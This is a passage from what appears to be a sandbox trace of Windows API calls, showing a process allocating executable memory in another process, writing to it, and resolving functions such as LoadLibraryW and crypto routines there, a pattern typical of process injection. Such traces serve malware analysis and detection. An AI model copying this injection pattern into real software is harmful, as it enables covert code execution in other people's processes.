	[0187.913] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.913] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.913] ResetEvent (hEvent=0x478) returned 1
	[0187.913] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.913] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.914] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.914] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.914] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.914] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x1005526c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.914] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.914] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.914] lstrlenA (lpString="GetStringTypeW") returned 14
	[0187.914] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.914] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7602*, nSize=0xf, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7602*, lpNumberOfBytesWritten=0x12857c*=0xf) returned 1
	[0187.915] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.915] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.915] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.915] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.915] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.916] ResetEvent (hEvent=0x478) returned 1
	[0187.916] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.916] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.916] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.916] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.916] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.916] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055270, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.917] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.917] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.917] lstrlenA (lpString="LCMapStringW") returned 12
	[0187.917] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.917] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7614*, nSize=0xd, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7614*, lpNumberOfBytesWritten=0x12857c*=0xd) returned 1
	[0187.917] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.917] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.917] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.917] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.918] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.918] ResetEvent (hEvent=0x478) returned 1
	[0187.918] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.918] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.918] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.919] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.919] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.919] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055274, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.919] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.919] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.919] lstrlenA (lpString="ReadConsoleW") returned 12
	[0187.919] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.919] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb794e*, nSize=0xd, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb794e*, lpNumberOfBytesWritten=0x12857c*=0xd) returned 1
	[0187.920] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.920] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.920] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.920] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.920] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.920] ResetEvent (hEvent=0x478) returned 1
	[0187.920] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.921] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.921] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.921] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.921] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.921] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055278, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.921] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.922] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0187.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xeb6d8a, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11
	[0187.922] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0187.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xeb6d8a, cbMultiByte=-1, lpWideCharStr=0x23078c0, cchWideChar=11 | out: lpWideCharStr="USER32.dll") returned 11
	[0187.922] lstrlenW (lpString="USER32.dll") returned 10
	[0187.922] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.922] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0x23078c0*, nSize=0x16, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x23078c0*, lpNumberOfBytesWritten=0x12857c*=0x16) returned 1
	[0187.922] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x128500 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x128500*=0x70) returned 1
	[0187.922] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.922] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.922] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0xc, lpNumberOfBytesWritten=0x1284f8 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f8*=0xc) returned 1
	[0187.923] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128520*, nSize=0x70, lpNumberOfBytesWritten=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesWritten=0x1284f8*=0x70) returned 1
	[0187.923] ResetEvent (hEvent=0x478) returned 1
	[0187.923] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.980] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x1284f8*=0x70) returned 1
	[0187.980] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.980] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.980] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.980] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0187.980] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.981] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.981] lstrlenA (lpString="wsprintfA") returned 9
	[0187.981] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.981] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6d80*, nSize=0xa, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6d80*, lpNumberOfBytesWritten=0x12857c*=0xa) returned 1
	[0187.981] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.981] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.981] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.982] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.982] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.982] ResetEvent (hEvent=0x478) returned 1
	[0187.982] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.982] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.982] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.983] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.983] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.983] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100552cc, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.983] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.983] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0187.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xeb6e76, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13
	[0187.983] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0187.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xeb6e76, cbMultiByte=-1, lpWideCharStr=0x23078c0, cchWideChar=13 | out: lpWideCharStr="ADVAPI32.dll") returned 13
	[0187.983] lstrlenW (lpString="ADVAPI32.dll") returned 12
	[0187.983] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.984] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0x23078c0*, nSize=0x1a, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x23078c0*, lpNumberOfBytesWritten=0x12857c*=0x1a) returned 1
	[0187.984] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x128500 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x128500*=0x70) returned 1
	[0187.984] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.984] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.984] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0xc, lpNumberOfBytesWritten=0x1284f8 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f8*=0xc) returned 1
	[0187.985] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128520*, nSize=0x70, lpNumberOfBytesWritten=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesWritten=0x1284f8*=0x70) returned 1
	[0187.985] ResetEvent (hEvent=0x478) returned 1
	[0187.985] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.986] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x1284f8*=0x70) returned 1
	[0187.986] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.986] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.986] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.986] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0187.987] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.987] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.987] lstrlenA (lpString="CryptDestroyHash") returned 16
	[0187.987] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.987] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6df4*, nSize=0x11, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6df4*, lpNumberOfBytesWritten=0x12857c*=0x11) returned 1
	[0187.987] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.987] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.987] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.987] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.988] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.988] ResetEvent (hEvent=0x478) returned 1
	[0187.988] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.989] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.989] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.989] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.989] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.989] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055000, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.989] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.990] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.990] lstrlenA (lpString="CryptGetHashParam") returned 17
	[0187.990] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.990] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6de0*, nSize=0x12, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6de0*, lpNumberOfBytesWritten=0x12857c*=0x12) returned 1
	[0187.990] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.990] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.990] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.990] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.991] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.991] ResetEvent (hEvent=0x478) returned 1
	[0187.991] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.991] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.991] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.991] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.991] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.991] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055004, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.992] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.992] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.992] lstrlenA (lpString="CryptGenKey") returned 11
	[0187.992] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.992] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6dd2*, nSize=0xc, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6dd2*, lpNumberOfBytesWritten=0x12857c*=0xc) returned 1
	[0187.992] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.993] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.993] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.993] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.993] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.993] ResetEvent (hEvent=0x478) returned 1
	[0187.993] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.994] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.994] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.994] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.994] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.994] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055008, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.994] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.994] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.995] lstrlenA (lpString="CryptReleaseContext") returned 19
	[0187.995] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.995] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6dbc*, nSize=0x14, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6dbc*, lpNumberOfBytesWritten=0x12857c*=0x14) returned 1
	[0187.995] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.995] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.995] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.995] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.996] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.996] ResetEvent (hEvent=0x478) returned 1
